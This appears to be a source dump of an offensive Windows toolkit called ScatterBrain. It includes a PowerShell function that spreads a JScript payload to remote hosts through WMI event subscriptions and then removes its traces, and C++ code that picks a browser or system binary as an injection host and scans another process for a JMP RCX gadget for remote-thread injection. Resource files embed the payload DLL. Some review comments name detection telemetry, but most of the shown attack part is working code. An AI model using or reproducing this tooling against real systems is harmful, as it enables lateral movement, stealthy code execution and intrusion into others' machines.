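    // RegGetValueW counts bytes while the string counts wchar_t; convert at the boundary
    // rather than passing the element count as if it were a byte count.
    auto cbData = static_cast<DWORD>(bufferSize * sizeof(wchar_t));
    auto rc = RegGetValueW(
        HKEY_CLASSES_ROOT,
        regSubKey.c_str(),
        regValue.c_str(),
        RRF_RT_REG_SZ,
        nullptr,
        static_cast<void*>(&valueBuf.at(0)),
        &cbData
    );
    while (rc == ERROR_MORE_DATA)
    {
        // On ERROR_MORE_DATA cbData holds the byte count the value needs
        // (terminating NUL included); round up to whole characters and make
        // sure the buffer actually grows.
        const size_t needed = (cbData + sizeof(wchar_t) - 1) / sizeof(wchar_t);
        bufferSize = needed > bufferSize ? needed : bufferSize * 2;
        valueBuf.resize(bufferSize);
        cbData = static_cast<DWORD>(bufferSize * sizeof(wchar_t));
        // Retry against the same root key: HKCR, not HKLM.
        rc = RegGetValueW(
            HKEY_CLASSES_ROOT,
            regSubKey.c_str(),
            regValue.c_str(),
            RRF_RT_REG_SZ,
            nullptr,
            static_cast<void*>(&valueBuf.at(0)),
            &cbData
        );
    }
    if (rc != ERROR_SUCCESS)
    {
        throw std::runtime_error("Windows system error code: " + std::to_string(rc));
    }
    // cbData now holds the bytes written, NUL included for REG_SZ; drop the NUL
    // so the returned wstring compares and concatenates as a normal string.
    valueBuf.resize(cbData / sizeof(wchar_t));
    while (!valueBuf.empty() && valueBuf.back() == L'\0')
    {
        valueBuf.pop_back();
    }
    return valueBuf;
}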
109 |
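/*! \brief Reads a REG_SZ value from HKEY_LOCAL_MACHINE as a string.
 *  \param regSubKey Sub-key path below HKLM, e.g. L"SOFTWARE\\Classes\\sip\\shell\\open\\command".
 *  \param regValue  Value name; an empty string selects the key's default value.
 *  \return The value data without its terminating NUL.
 *  \exception std::runtime_error if RegGetValueW returns anything other than
 *             ERROR_SUCCESS; the Win32 status code is carried in the message.
 */
std::wstring GetStringValueFromHKLM(const std::wstring& regSubKey, const std::wstring& regValue)
{
    size_t bufferSize = 0xFFF;   // Initial guess in wchar_t; grown below on ERROR_MORE_DATA.
    std::wstring valueBuf;       // Contiguous since C++11, so &valueBuf.at(0) is a valid out-buffer.
    valueBuf.resize(bufferSize);
    // RegGetValueW counts bytes while the string counts wchar_t; convert at the boundary
    // rather than passing the element count as if it were a byte count.
    auto cbData = static_cast<DWORD>(bufferSize * sizeof(wchar_t));
    auto rc = RegGetValueW(
        HKEY_LOCAL_MACHINE,
        regSubKey.c_str(),
        regValue.c_str(),
        RRF_RT_REG_SZ,
        nullptr,
        static_cast<void*>(&valueBuf.at(0)),
        &cbData
    );
    while (rc == ERROR_MORE_DATA)
    {
        // On ERROR_MORE_DATA cbData holds the byte count the value needs
        // (terminating NUL included); round up to whole characters and make
        // sure the buffer actually grows.
        const size_t needed = (cbData + sizeof(wchar_t) - 1) / sizeof(wchar_t);
        bufferSize = needed > bufferSize ? needed : bufferSize * 2;
        valueBuf.resize(bufferSize);
        cbData = static_cast<DWORD>(bufferSize * sizeof(wchar_t));
        rc = RegGetValueW(
            HKEY_LOCAL_MACHINE,
            regSubKey.c_str(),
            regValue.c_str(),
            RRF_RT_REG_SZ,
            nullptr,
            static_cast<void*>(&valueBuf.at(0)),
            &cbData
        );
    }
    if (rc != ERROR_SUCCESS)
    {
        throw std::runtime_error("Windows system error code: " + std::to_string(rc));
    }
    // cbData now holds the bytes written, NUL included for REG_SZ; drop the NUL
    // so the returned wstring compares and concatenates as a normal string.
    valueBuf.resize(cbData / sizeof(wchar_t));
    while (!valueBuf.empty() && valueBuf.back() == L'\0')
    {
        valueBuf.pop_back();
    }
    return valueBuf;
}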
--------------------------------------------------------------------------------
/regfree_com_activation_templates/wmi.ps1:
--------------------------------------------------------------------------------
# Creates a short-lived WMI permanent-event subscription on $ComputerName that
# runs the embedded JScript once, then removes every object it created.
#
# Objects created (and removed again ~45 s later by the cleanup block at the end):
#   root\cimv2\__IntervalTimerInstruction          TimerId 'Timer' (fires every 30 s)
#   root\subscription\__EventFilter                Name 'Updater' (WQL on __TimerEvent)
#   root\subscription\ActiveScriptEventConsumer    Name 'Updater' (JScript engine)
#   root\subscription\__FilterToConsumerBinding    Filter -> Consumer
# Defender note: because the subscription is torn down almost immediately, a
# periodic inventory of root\subscription will usually miss it; registration is
# recorded at creation time by Sysmon Event IDs 19/20/21 (WmiEventFilter /
# WmiEventConsumer / WmiEventConsumerToFilter) and by the
# Microsoft-Windows-WMI-Activity/Operational log, and the script itself runs
# inside scrcons.exe on the target.
function Invoke-WMILateralSpread {
    [CmdletBinding()]
    Param (
        [ValidateNotNullOrEmpty()]
        [String]
        $ComputerName = '.',

        # NOTE(review): '.*\.*' matches any string, so no user-name shape is enforced.
        [ValidatePattern('.*\.*')]
        [String]
        $UserName,

        # Taken as plain text, so it appears in transcripts, command history and
        # script-block logging (event 4104).
        [ValidateNotNullOrEmpty()]
        [String]
        $Password,

        # Declared but not referenced anywhere in the function body.
        [ValidateNotNullOrEmpty()]
        [String]
        $SpawnProcess = "rundll32.exe"
    )


    # Explicit credentials are only built when a user name was bound; otherwise
    # the caller's own token is used for every WMI call below.
    if ($PSBoundParameters['UserName']) {
        $SecPassword = ConvertTo-SecureString $PSBoundParameters['Password'] -AsPlainText -Force
        $Credential = New-Object System.Management.Automation.PSCredential($PSBoundParameters['UserName'], $SecPassword)
    }

    # set up a 30 second timer
    $TimerArg = @{
        IntervalBetweenEvents = ([UInt32] 30000)
        SkipIfPassed = $False
        TimerId = 'Timer'
    }

    $Arguments = @{
        Namespace = 'ROOT\cimv2'
        Class = '__IntervalTimerInstruction'
        ComputerName = $ComputerName
        Arguments = $TimerArg
        ErrorAction = 'Stop'
    }

    if ($Credential) { $Arguments['Credential'] = $Credential }
    Write-Verbose "Installing timer with name 'Timer' on $ComputerName"
    $Timer = Set-WmiInstance @Arguments   # result is not used afterwards


    # set up the timer filter
    $Trigger = @{
        Name = 'Updater'
        EventNameSpace = 'ROOT\cimv2'
        QueryLanguage = 'WQL'
        Query = "SELECT * FROM __TimerEvent WHERE TimerID = 'Timer'"
    }

    $FilterParams = @{
        Namespace = 'root\subscription'
        Class = '__EventFilter'
        ComputerName = $ComputerName
        Arguments = $Trigger
        ErrorAction = 'Stop'
    }

    if ($Credential) { $FilterParams['Credential'] = $Credential }
    Write-Verbose "Installing event filter 'Updater' for the timer on $ComputerName"
    $Filter = Set-WmiInstance @FilterParams


    # the actual payload used
    # (the generator substitutes the JScript template for the placeholder line;
    # the here-string terminator must stay at column 0)
    $JScript = @"
JSCRIPT_FORMATTED_TEMPLATE_HERE
"@

    $Action = @{
        Name = 'Updater'
        ScriptingEngine = 'JScript'
        ScriptText = $JScript
        KillTimeout = [UInt32] 45
    }

    $ConsumerParams = @{
        Namespace = 'root\subscription'
        Class = 'ActiveScriptEventConsumer'
        ComputerName = $ComputerName
        Arguments = $Action
        ErrorAction = 'Stop'
    }

    if ($Credential) { $ConsumerParams['Credential'] = $Credential }
    Write-Verbose "Installing event consumer 'Updater' on $ComputerName"
    $Consumer = Set-WmiInstance @ConsumerParams


    # bind it all together
    $BindingParams = @{
        Namespace = 'root\subscription'
        Class = '__FilterToConsumerBinding'
        ComputerName = $ComputerName
        Arguments = @{ Filter = $Filter; Consumer = $Consumer }
        ErrorAction = 'Stop'
    }

    if ($Credential) { $BindingParams['Credential'] = $Credential }
    Write-Verbose "Installing filter to consumer binding on $ComputerName"
    $FilterConsumerBinding = Set-WmiInstance @BindingParams

    # Assembled but never written to the pipeline, so callers get no output object.
    $Result = New-Object PSObject -Property @{
        Filter = $Filter
        Consumer = $Consumer
        Binding = $FilterConsumerBinding
    }


    Write-Verbose "Waiting 45 seconds for event to trigger on $ComputerName ..."
    Start-Sleep -Seconds 45


    # Cleanup.  Note that -match is a regex test, so the TimerId / Filter / Name
    # filters below remove every object whose name merely contains 'Timer' or
    # 'Updater', not only the ones created above.
    $CleanupParams = @{
        ComputerName = $ComputerName
    }
    if ($Credential) { $CleanupParams['Credential'] = $Credential }
    Write-Verbose "Removing 'Timer' internal timer from $ComputerName"
    Get-WMIObject -Namespace root\cimv2 -Class __IntervalTimerInstruction @CleanupParams | ?{$_.TimerId -match 'Timer'} | Remove-WMIObject

    Write-Verbose "Removing filter to consumer binding from $ComputerName"
    Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding @CleanupParams | ?{$_.Filter -match 'Updater'} | Remove-WMIObject

    Write-Verbose "Removing event filter from $ComputerName"
    Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name LIKE 'Updater'" @CleanupParams | Remove-WMIObject

    Write-Verbose "Removing event consumer from $ComputerName"
    Get-WMIObject -Namespace root\Subscription -Class __EventConsumer @CleanupParams | ?{$_.Name -match 'Updater'} | Remove-WMIObject

    Write-Verbose "Cleanup completed on $ComputerName"
}
135 |
--------------------------------------------------------------------------------
/ScatterBrain/Executables.cpp:
--------------------------------------------------------------------------------
1 | // FileChecker.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "WindowsSecurity.h"
6 | #include "Browsers.h"
7 | #include "ChatApplications.h"
8 | #include "Helpers.h"
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | using namespace std;
15 |
16 |
// Picks one of seven Windows-owned executables under %SYSTEMROOT% at random
// and returns it as a wide string produced by CharToWcharT (Helpers.h).
// GetValidExecutable() falls back to this when no browser or chat client is
// found, or when running at high integrity.
wchar_t* GetWindowsBinary()
{
    DWORD sz = sizeof(char) * MAX_PATH;
    const int szBinaries = 7;
    const char* binaries[szBinaries] = {
        "\\splwow64.exe",
        "\\System32\\printfilterpipelinesvc.exe",
        "\\System32\\PrintIsolationHost.exe",
        "\\System32\\spoolsv.exe",
        "\\System32\\upnpcont.exe",
        "\\System32\\conhost.exe",
        "\\System32\\convertvhd.exe"
    };

    char* path;
    size_t szLen;
    _dupenv_s(&path, &szLen, "SYSTEMROOT");   // status/NULL unchecked, and `path` is never freed

    char* retBinary = (char*)malloc(sz);
    ZeroMemory(retBinary, sz);
    int i = 0;
    //struct _stat buffer;
    do
    {
        strcpy_s(retBinary, sz, path);
        srand(time(0));   // reseeded from the wall clock on every pass
        i = rand() % szBinaries;
        strcat_s(retBinary, sz, binaries[i]);
        if (FileExistsAndIs64Bit(retBinary))
        {

            printf("[*] Windows Binary: %s\n", retBinary);
        }
        else
        {
            // Candidate rejected: the buffer is emptied, but the pointer stays non-NULL.
            ZeroMemory(retBinary, sz);
        }
    } while (retBinary == NULL);   // retBinary is a malloc pointer, so this is always false:
                                   // the body runs exactly once and a rejected candidate
                                   // yields an empty string below.
    wchar_t* finalResult = CharToWcharT(retBinary);
    return finalResult;
}
58 |
// Selects an executable path by trying, in order: the user's default browser,
// Chrome, Chrome SxS, Firefox, a chat client, and finally a Windows binary.
// The browser/chat steps are skipped entirely when IsHighIntegrity()
// (WindowsSecurity.h) reports true.  Every producer returns a heap string
// that the caller owns; the Windows-binary fallback never returns NULL.
wchar_t* GetValidExecutable()
{
    // If not high integrity, find some applications
    // a user might use.
    if (!IsHighIntegrity())
    {
        // Try and get the default browser.
        wchar_t* defaultBrowser = GetDefaultBrowser();

        if (defaultBrowser == NULL)
        {
            // Otherwise, attempt to find default browser paths.
            wchar_t* chromePath = GetGoogleChromePath();
            if (chromePath != NULL)
            {
                return chromePath;
            }

            wchar_t* chromeSxSPath = GetGoogleChromeSxSPath();
            if (chromeSxSPath != NULL)
            {
                return chromeSxSPath;
            }

            wchar_t* firefoxPath = GetFireFoxPath();
            if (firefoxPath != NULL)
            {
                return firefoxPath;
            }
        }
        else
        {
            return defaultBrowser;
        }
        // We've failed to find a default browser.
        // Let's look for chat applications instead.
        wchar_t* chatApp = GetChatApplication();
        if (chatApp != NULL)
        {
            return chatApp;
        }
    }

    // If we can't find the above, or we're a high
    // integrity process (like running under SYSTEM)
    // then get a Windows binary to launch.
    wchar_t* windowsBinary = GetWindowsBinary();
    return windowsBinary;
}
108 |
// Helper function to find a jmp rcx gadget for CreateRemoteThread.
// Needs more testing and only really useful on certain binaries.
// I know Chrome and FireFox work for sure but others are questionable.
//
// Parameters:
//   binaryName - path of the image to scan; it is loaded into *this* process
//                with LoadLibrary to obtain a base address.
//   retGadget  - out-param; must point to NULL on entry (both loops stop as
//                soon as it becomes non-NULL) and receives the gadget address.
//   pid        - process whose memory is read with ReadProcessMemory.
// Return codes are inconsistent: 0 on success, 1 when the file size cannot be
// read or no gadget is found, but NULL (== 0) when OpenProcess or LoadLibrary
// fail, so callers must check *retGadget rather than the return value alone.
// Detection note: OpenProcess(PROCESS_ALL_ACCESS) followed by ReadProcessMemory
// on another PID is the cross-process access pattern recorded by Sysmon Event
// ID 10 (ProcessAccess) and equivalent EDR telemetry; the printf/wprintf calls
// also write progress to the hosting process's stdout.
int FindRetGadget(wchar_t* binaryName, void** retGadget, int pid)
{
    //int pid = 11744; // temp for testing
    char buffer[4096];
    SIZE_T bytesWritten = 0, bytesRead = 0;   // bytesWritten is unused
    HANDLE threadHandle;                      // unused
    DWORD i = 0, j = 0, threadId = 0;         // threadId is unused

    HANDLE processHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
    if (processHandle == INVALID_HANDLE_VALUE || processHandle == NULL) {
        printf("[X] Error: Could not open process with PID %d\n", pid);
        return NULL;
    }
    // NOTE(review): processHandle is never closed on any path below.

    char* base = (char*)LoadLibrary(binaryName);
    if (base == NULL)
    {
        wprintf(L"[X] Could not load %s.\n", binaryName);
        return NULL;
    }

    // ios::ate opens positioned at the end, so tellg() is the file size
    // (held in an int, so very large images would misreport).
    ifstream file(binaryName, ios::in | ios::binary | ios::ate);
    int fileSize = 0;
    if (file.is_open())
    {
        file.seekg(0, ios::end);
        fileSize = file.tellg();
        file.close();
    }

    if (fileSize == 0)
    {
        printf("[X] Could not open file to determine size.\n");
        return 1;
    }

    wprintf(L"Size of %s is %d\n", binaryName, fileSize);
    // Hunting for a JMP RCX (\xff\xe1) instruction
    // Reads the target in 4 KiB windows; the `j + 1 < bytesRead` bound keeps
    // the two-byte compare inside the bytes actually read.
    for (i = 0; i < fileSize && *retGadget == NULL; i += bytesRead) {
        printf("[*] Hunting for gadget at address %p\n", (char *)base + i);
        ReadProcessMemory(processHandle, (char *)base + i, buffer, 4096, &bytesRead);
        for (j = 0; j + 1 < bytesRead && *retGadget == NULL; j++) {
            if (buffer[j] == '\xff' && buffer[j + 1] == '\xe1') {
                //printf("[+] Found retGadget!\n");
                *retGadget = (char *)base + i + j;
            }
        }
    }
    if (*retGadget == NULL) {
        printf("[X] Error: Could not find JMP gadget\n");
        return 1;
    }
    wprintf(L"[*] Found JMP RCX gadget at address %p for %s\n", *retGadget, binaryName);
    return 0;
}
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.suo
8 | *.user
9 | *.userosscache
10 | *.sln.docstates
11 |
12 | # User-specific files (MonoDevelop/Xamarin Studio)
13 | *.userprefs
14 |
15 | # Build results
16 | [Dd]ebug/
17 | [Dd]ebugPublic/
18 | [Rr]elease/
19 | [Rr]eleases/
20 | x64/
21 | x86/
22 | bld/
23 | [Bb]in/
24 | [Oo]bj/
25 | [Ll]og/
26 | # Visual Studio 2015 cache/options directory
27 | .vs/
28 | # Uncomment if you have tasks that create the project's static files in wwwroot
29 | #wwwroot/
30 |
31 | # MSTest test Results
32 | [Tt]est[Rr]esult*/
33 | [Bb]uild[Ll]og.*
34 |
35 | # NUNIT
36 | *.VisualState.xml
37 | TestResult.xml
38 |
39 | # Build Results of an ATL Project
40 | [Dd]ebugPS/
41 | [Rr]eleasePS/
42 | dlldata.c
43 |
44 | # .NET Core
45 | project.lock.json
46 | project.fragment.lock.json
47 | artifacts/
48 | **/Properties/launchSettings.json
49 |
50 | *_i.c
51 | *_p.c
52 | *_i.h
53 | *.ilk
54 | *.meta
55 | *.obj
56 | *.pch
57 | *.pdb
58 | *.pgc
59 | *.pgd
60 | *.rsp
61 | *.sbr
62 | *.tlb
63 | *.tli
64 | *.tlh
65 | *.tmp
66 | *.tmp_proj
67 | *.log
68 | *.vspscc
69 | *.vssscc
70 | .builds
71 | *.pidb
72 | *.svclog
73 | *.scc
74 |
75 | # Chutzpah Test files
76 | _Chutzpah*
77 |
78 | # Visual C++ cache files
79 | ipch/
80 | *.aps
81 | *.ncb
82 | *.opendb
83 | *.opensdf
84 | *.sdf
85 | *.cachefile
86 | *.VC.db
87 | *.VC.VC.opendb
88 |
89 | # Visual Studio profiler
90 | *.psess
91 | *.vsp
92 | *.vspx
93 | *.sap
94 |
95 | # TFS 2012 Local Workspace
96 | $tf/
97 |
98 | # Guidance Automation Toolkit
99 | *.gpState
100 |
101 | # ReSharper is a .NET coding add-in
102 | _ReSharper*/
103 | *.[Rr]e[Ss]harper
104 | *.DotSettings.user
105 |
106 | # JustCode is a .NET coding add-in
107 | .JustCode
108 |
109 | # TeamCity is a build add-in
110 | _TeamCity*
111 |
112 | # DotCover is a Code Coverage Tool
113 | *.dotCover
114 |
115 | # Visual Studio code coverage results
116 | *.coverage
117 | *.coveragexml
118 |
119 | # NCrunch
120 | _NCrunch_*
121 | .*crunch*.local.xml
122 | nCrunchTemp_*
123 |
124 | # MightyMoose
125 | *.mm.*
126 | AutoTest.Net/
127 |
128 | # Web workbench (sass)
129 | .sass-cache/
130 |
131 | # Installshield output folder
132 | [Ee]xpress/
133 |
134 | # DocProject is a documentation generator add-in
135 | DocProject/buildhelp/
136 | DocProject/Help/*.HxT
137 | DocProject/Help/*.HxC
138 | DocProject/Help/*.hhc
139 | DocProject/Help/*.hhk
140 | DocProject/Help/*.hhp
141 | DocProject/Help/Html2
142 | DocProject/Help/html
143 |
144 | # Click-Once directory
145 | publish/
146 |
147 | # Publish Web Output
148 | *.[Pp]ublish.xml
149 | *.azurePubxml
150 | # TODO: Comment the next line if you want to checkin your web deploy settings
151 | # but database connection strings (with potential passwords) will be unencrypted
152 | *.pubxml
153 | *.publishproj
154 |
155 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
156 | # checkin your Azure Web App publish settings, but sensitive information contained
157 | # in these scripts will be unencrypted
158 | PublishScripts/
159 |
160 | # NuGet Packages
161 | *.nupkg
162 | # The packages folder can be ignored because of Package Restore
163 | **/packages/*
164 | # except build/, which is used as an MSBuild target.
165 | !**/packages/build/
166 | # Uncomment if necessary; generally it will be regenerated when needed
167 | #!**/packages/repositories.config
168 | # NuGet v3's project.json files produce more ignorable files
169 | *.nuget.props
170 | *.nuget.targets
171 |
172 | # Microsoft Azure Build Output
173 | csx/
174 | *.build.csdef
175 |
176 | # Microsoft Azure Emulator
177 | ecf/
178 | rcf/
179 |
180 | # Windows Store app package directories and files
181 | AppPackages/
182 | BundleArtifacts/
183 | Package.StoreAssociation.xml
184 | _pkginfo.txt
185 |
186 | # Visual Studio cache files
187 | # files ending in .cache can be ignored
188 | *.[Cc]ache
189 | # but keep track of directories ending in .cache
190 | !*.[Cc]ache/
191 |
192 | # Others
193 | ClientBin/
194 | ~$*
195 | *~
196 | *.dbmdl
197 | *.dbproj.schemaview
198 | *.jfm
199 | *.pfx
200 | *.publishsettings
201 | node_modules/
202 | orleans.codegen.cs
203 |
204 | # Since there are multiple workflows, uncomment next line to ignore bower_components
205 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
206 | #bower_components/
207 |
208 | # RIA/Silverlight projects
209 | Generated_Code/
210 |
211 | # Backup & report files from converting an old project file
212 | # to a newer Visual Studio version. Backup files are not needed,
213 | # because we have git ;-)
214 | _UpgradeReport_Files/
215 | Backup*/
216 | UpgradeLog*.XML
217 | UpgradeLog*.htm
218 |
219 | # SQL Server files
220 | *.mdf
221 | *.ldf
222 |
223 | # Business Intelligence projects
224 | *.rdl.data
225 | *.bim.layout
226 | *.bim_*.settings
227 |
228 | # Microsoft Fakes
229 | FakesAssemblies/
230 |
231 | # GhostDoc plugin setting file
232 | *.GhostDoc.xml
233 |
234 | # Node.js Tools for Visual Studio
235 | .ntvs_analysis.dat
236 |
237 | # Visual Studio 6 build log
238 | *.plg
239 |
240 | # Visual Studio 6 workspace options file
241 | *.opt
242 |
243 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
244 | *.vbw
245 |
246 | # Visual Studio LightSwitch build output
247 | **/*.HTMLClient/GeneratedArtifacts
248 | **/*.DesktopClient/GeneratedArtifacts
249 | **/*.DesktopClient/ModelManifest.xml
250 | **/*.Server/GeneratedArtifacts
251 | **/*.Server/ModelManifest.xml
252 | _Pvt_Extensions
253 |
254 | # Paket dependency manager
255 | .paket/paket.exe
256 | paket-files/
257 |
258 | # FAKE - F# Make
259 | .fake/
260 |
261 | # JetBrains Rider
262 | .idea/
263 | *.sln.iml
264 |
265 | # CodeRush
266 | .cr/
267 |
268 | # Python Tools for Visual Studio (PTVS)
269 | __pycache__/
270 | *.pyc
271 |
272 | # Cake - Uncomment if you are using it
273 | # tools/
274 |
275 | ScatterBrain/RawData.h
276 | DWELLS/data1.bin
277 | **/*.dll
278 | *.dll
279 | **/*.exe
280 | **/RawData.h
281 | **/*.bin
282 |
--------------------------------------------------------------------------------
/SharpWMI/SharpWMI/Properties/Resources.resx:
--------------------------------------------------------------------------------
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 |
122 | ..\Resources\ScatterBrain.dll;System.Byte[], mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
123 |
124 |
--------------------------------------------------------------------------------
/AccessibilityFeaturesPersistence/Properties/Resources.resx:
--------------------------------------------------------------------------------
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 |
122 | ..\Resources\ScatterBrain.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
123 |
124 |
--------------------------------------------------------------------------------
/ScatterBrain.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28010.2026
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ScatterBrain", "ScatterBrain\ScatterBrain.vcxproj", "{B59D77D7-D8DB-45DB-9B1F-0795FA32459C}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Cryptor", "Cryptor\Cryptor.csproj", "{D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}"
9 | EndProject
10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpWMI", "SharpWMI\SharpWMI\SharpWMI.csproj", "{6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}"
11 | ProjectSection(ProjectDependencies) = postProject
12 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C} = {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}
13 | EndProjectSection
14 | EndProject
15 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DWELLS", "DWELLS\DWELLS.vcxproj", "{E6331C54-4C87-41EE-AE06-8B47AC7D9306}"
16 | ProjectSection(ProjectDependencies) = postProject
17 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C} = {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}
18 | EndProjectSection
19 | EndProject
20 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AccessibilityFeaturesPersistence", "AccessibilityFeaturesPersistence\AccessibilityFeaturesPersistence.csproj", "{558CF1E0-1983-4BF3-81CE-961058ACE7C0}"
21 | ProjectSection(ProjectDependencies) = postProject
22 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C} = {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}
23 | EndProjectSection
24 | EndProject
25 | Global
26 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
27 | Debug|Any CPU = Debug|Any CPU
28 | Debug|x64 = Debug|x64
29 | Debug|x86 = Debug|x86
30 | Release|Any CPU = Release|Any CPU
31 | Release|x64 = Release|x64
32 | Release|x86 = Release|x86
33 | EndGlobalSection
34 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
35 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Debug|Any CPU.ActiveCfg = Debug|Win32
36 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Debug|x64.ActiveCfg = Debug|x64
37 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Debug|x64.Build.0 = Debug|x64
38 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Debug|x86.ActiveCfg = Debug|Win32
39 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Debug|x86.Build.0 = Debug|Win32
40 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Release|Any CPU.ActiveCfg = Release|Win32
41 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Release|x64.ActiveCfg = Release|x64
42 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Release|x64.Build.0 = Release|x64
43 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Release|x86.ActiveCfg = Release|Win32
44 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Release|x86.Build.0 = Release|Win32
45 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
46 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Debug|Any CPU.Build.0 = Debug|Any CPU
47 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Debug|x64.ActiveCfg = Debug|Any CPU
48 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Debug|x64.Build.0 = Debug|Any CPU
49 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Debug|x86.ActiveCfg = Debug|Any CPU
50 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Debug|x86.Build.0 = Debug|Any CPU
51 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Release|Any CPU.ActiveCfg = Release|Any CPU
52 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Release|Any CPU.Build.0 = Release|Any CPU
53 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Release|x64.ActiveCfg = Release|Any CPU
54 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Release|x64.Build.0 = Release|Any CPU
55 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Release|x86.ActiveCfg = Release|Any CPU
56 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Release|x86.Build.0 = Release|Any CPU
57 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
58 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|Any CPU.Build.0 = Debug|Any CPU
59 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|x64.ActiveCfg = Debug|Any CPU
60 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|x64.Build.0 = Debug|Any CPU
61 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|x86.ActiveCfg = Debug|Any CPU
62 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|x86.Build.0 = Debug|Any CPU
63 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|Any CPU.ActiveCfg = Release|Any CPU
64 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|Any CPU.Build.0 = Release|Any CPU
65 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|x64.ActiveCfg = Release|Any CPU
66 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|x64.Build.0 = Release|Any CPU
67 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|x86.ActiveCfg = Release|Any CPU
68 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|x86.Build.0 = Release|Any CPU
69 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Debug|Any CPU.ActiveCfg = Debug|Win32
70 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Debug|x64.ActiveCfg = Debug|x64
71 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Debug|x64.Build.0 = Debug|x64
72 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Debug|x86.ActiveCfg = Debug|Win32
73 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Debug|x86.Build.0 = Debug|Win32
74 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Release|Any CPU.ActiveCfg = Release|Win32
75 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Release|x64.ActiveCfg = Release|x64
